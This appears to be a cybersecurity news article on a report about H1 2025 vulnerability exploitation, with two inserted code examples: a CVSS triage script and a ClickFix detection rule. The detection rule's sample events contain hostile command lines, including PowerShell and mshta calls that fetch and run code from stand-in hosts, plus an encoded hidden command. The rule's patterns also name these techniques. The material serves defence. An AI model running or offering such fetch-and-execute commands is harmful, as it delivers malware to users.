State Hackers Exploit Most Software Vulnerabilities

Summary

– 53% of vulnerability exploits in H1 2025 were by state-sponsored actors, primarily for geopolitical purposes like espionage and surveillance.
– Chinese state-sponsored groups were the most active, targeting edge infrastructure and enterprise solutions, with UNC5221 exploiting the most vulnerabilities.
– 47% of exploits were financially motivated, with 27% from theft/fraud groups and 20% from ransomware/extortion groups.
– 69% of exploited vulnerabilities required no authentication, and 30% enabled remote code execution, allowing attacks directly from the internet.
– Ransomware actors adopted new initial access techniques like ClickFix social engineering and increased use of EDR evasion methods post-compromise.

A new cybersecurity report reveals that state-sponsored hackers were responsible for over half of all attributed software vulnerability exploits during the first half of 2025. These sophisticated actors, backed by national governments, primarily leverage security flaws for strategic espionage and surveillance operations rather than financial gain. The findings underscore a significant shift toward highly targeted campaigns aimed at critical infrastructure and enterprise systems.

According to the analysis, Chinese state-linked groups dominated these activities, focusing heavily on edge infrastructure and widely used enterprise solutions. Among these, a cluster tracked as UNC5221 stood out for its aggressive exploitation of vulnerabilities in Ivanti products, including Endpoint Manager Mobile, Connect Secure, and Policy Secure. Their operations continue a pattern observed since the previous year.

Financially motivated actors accounted for the remainder of the exploitation activity. Approximately 27% of incidents involved theft and fraud unrelated to ransomware, while another 20% were tied directly to ransomware and extortion groups. Despite differing motives, both state and criminal hackers showed a strong preference for targeting edge security appliances, remote access services, and gateway-level software due to the high strategic value these systems provide.

Microsoft emerged as the most frequently targeted vendor, with its products involved in 17% of all documented exploitations. The sheer prevalence of Microsoft software in organizational environments makes it an attractive objective for attackers seeking maximum impact.

Alarmingly, the majority of exploited vulnerabilities required no authentication, meaning attackers could launch attacks directly over the internet without login credentials or prior access to the internal network. Nearly 70% of the 161 distinct vulnerabilities fell into this category, and almost half were remotely exploitable. Furthermore, 30% of these flaws enabled remote code execution, often granting complete control over the compromised system.
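The two properties the report singles out, no authentication needed and reachable over the network, map onto CVSS v3.x base metrics (PR:N and AV:N respectively), which is how a defender would triage a patch backlog against this finding. The following is an added example, not code or data from the report; the report does not say it derived its figures from CVSS vectors, so that mapping is an assumption made here, and the vector strings and VULN-nnn identifiers are constructed sample data, not real CVEs.

```python
"""Triage CVSS v3.x vectors for 'unauthenticated' and 'internet-reachable'.

Added example (not from the report). Mapping PR:N -> unauthenticated and
AV:N -> remotely exploitable is an assumption of this example; RCE is a
vulnerability class, not a CVSS metric, so it is deliberately not inferred.
"""

REQUIRED_BASE = {"AV", "AC", "PR", "UI", "S", "C", "I", "A"}


def parse_vector(vector: str) -> dict[str, str]:
    """Parse 'CVSS:3.x/AV:N/AC:L/...' into {metric: value}, validating the base metrics."""
    parts = vector.strip().split("/")
    if not parts or not parts[0].startswith("CVSS:3."):
        raise ValueError(f"not a CVSS v3.x vector: {vector!r}")
    metrics: dict[str, str] = {}
    for part in parts[1:]:
        key, sep, value = part.partition(":")
        if not sep or not key or not value:
            raise ValueError(f"malformed metric {part!r} in {vector!r}")
        metrics[key] = value
    missing = REQUIRED_BASE - metrics.keys()
    if missing:
        raise ValueError(f"vector missing base metrics {sorted(missing)}: {vector!r}")
    return metrics


def is_unauthenticated(m: dict[str, str]) -> bool:
    return m["PR"] == "N"


def is_network_reachable(m: dict[str, str]) -> bool:
    return m["AV"] == "N"


def is_directly_exploitable(m: dict[str, str]) -> bool:
    """No credentials, reachable over the network, and no user click required."""
    return is_unauthenticated(m) and is_network_reachable(m) and m["UI"] == "N"


def summarize(vectors: dict[str, str]) -> dict[str, object]:
    """Compute the same kind of shares the report quotes, plus the IDs to patch first."""
    parsed = {vid: parse_vector(v) for vid, v in vectors.items()}
    n = len(parsed)
    pct = lambda count: round(100.0 * count / n, 1)  # noqa: E731 - small local helper
    direct = sorted(vid for vid, m in parsed.items() if is_directly_exploitable(m))
    return {
        "total": n,
        "unauthenticated_pct": pct(sum(is_unauthenticated(m) for m in parsed.values())),
        "network_reachable_pct": pct(sum(is_network_reachable(m) for m in parsed.values())),
        "directly_exploitable": direct,
    }


# Constructed sample data: placeholder IDs and vectors, not real CVEs.
SAMPLE_VECTORS = {
    "VULN-001": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",  # unauth, network, no click
    "VULN-002": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",  # needs a low-priv account
    "VULN-003": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",  # unauth but needs a victim click
    "VULN-004": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",  # local privilege escalation
    "VULN-005": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",  # unauth, network, hard to pull off
}

if __name__ == "__main__":
    print(summarize(SAMPLE_VECTORS))
```

Only VULN-001 and VULN-005 come out as directly exploitable: VULN-003 is unauthenticated but still needs a victim to interact, which is exactly the gap between the report's 69% "no authentication" figure and its smaller "remotely exploitable" share.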

The report also highlighted the rise of “ClickFix” as a preferred social engineering technique among ransomware groups. This method involves deceiving users with fake error messages that prompt them to copy and paste malicious scripts, effectively bypassing security measures by relying on human error rather than technical weakness. A group called Interlock used this approach extensively in early 2025, later evolving their tactics to include “FileFix,” which manipulates users into entering harmful file paths directly into Windows Explorer.
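Because ClickFix relies on the victim pasting a command into the Run dialog (and FileFix into the Explorer address bar), the resulting process tree looks alike on the endpoint: an interpreter spawned by explorer.exe with a command line that hides its window, decodes an encoded payload, or fetches and evaluates remote content. The detection logic below is an added example, not from the report or any named vendor; the parent-process and command-line indicators are this example's assumptions about the technique, and the process-creation events it scans are constructed sample data.

```python
"""Flag ClickFix/FileFix-style process launches from constructed process-creation events.

Added example (not from the report). The rule keys on the launcher (explorer.exe,
which hosts both the Run dialog and the Explorer address bar) spawning a script
interpreter with a suspicious command line; these heuristics are assumptions.
"""
import re

LAUNCHERS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# (indicator name, pattern). Leading (?:^|\s) avoids \b, which does not fire before '-'.
INDICATORS = [
    ("hidden_window", re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b")),
    ("encoded_command", re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("inline_eval", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("remote_fetch", re.compile(r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b")),
    ("mshta_remote", re.compile(r"(?i)\bmshta(?:\.exe)?\s+https?://")),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix(event: dict) -> list[str]:
    """Return the indicator names that fired; an empty list means no alert."""
    if basename(event["parent"]) not in LAUNCHERS:
        return []
    if basename(event["image"]) not in INTERPRETERS:
        return []
    return [name for name, rx in INDICATORS if rx.search(event["cmd"])]


def scan(events: list[dict]) -> list[dict]:
    """Run the rule over a batch of events and return one alert per hit."""
    alerts = []
    for ev in events:
        hits = detect_clickfix(ev)
        if hits:
            alerts.append({"host": ev["host"], "cmd": ev["cmd"], "indicators": hits})
    return alerts


# Constructed sample events in a Sysmon-like shape (parent image, child image, command line).
SAMPLE_EVENTS = [
    {"host": "ws-17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (irm https://fix.example/verify)"'},      # ClickFix paste
    {"host": "ws-17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},               # benign admin use
    {"host": "ws-22", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://captcha-check.example/v.hta"},                           # ClickFix via mshta
    {"host": "srv-03", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -enc SQBFAFgAIAAoAEkAUgBNACAAaAB0AHQAcAA6AC8ALwAuAC4ALgApAA=="},  # not user-launched
    {"host": "ws-09", "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},            # unrelated
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The services.exe event carries the same hidden-window and encoded-command flags but is not the ClickFix pattern, since no user pasted it; it belongs to a separate rule for suspicious PowerShell regardless of parent. Keeping the launcher check tight is what stops the ordinary `-File` administration on ws-17 from alerting.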

Beyond initial access, ransomware actors are increasingly adopting advanced methods to avoid detection. These include bring-your-own-installer (BYOI) techniques to evade endpoint detection and response (EDR) systems, along with custom payloads that use just-in-time hooking and memory injection. These strategies allow attackers to maintain persistence and operate stealthily within compromised networks.

Researchers anticipate that both state-aligned and financially driven threat groups will continue prioritizing these attack vectors throughout the remainder of the year, especially as the number of disclosed vulnerabilities continues to climb.

(Source: NewsAPI Cybersecurity & Enterprise)
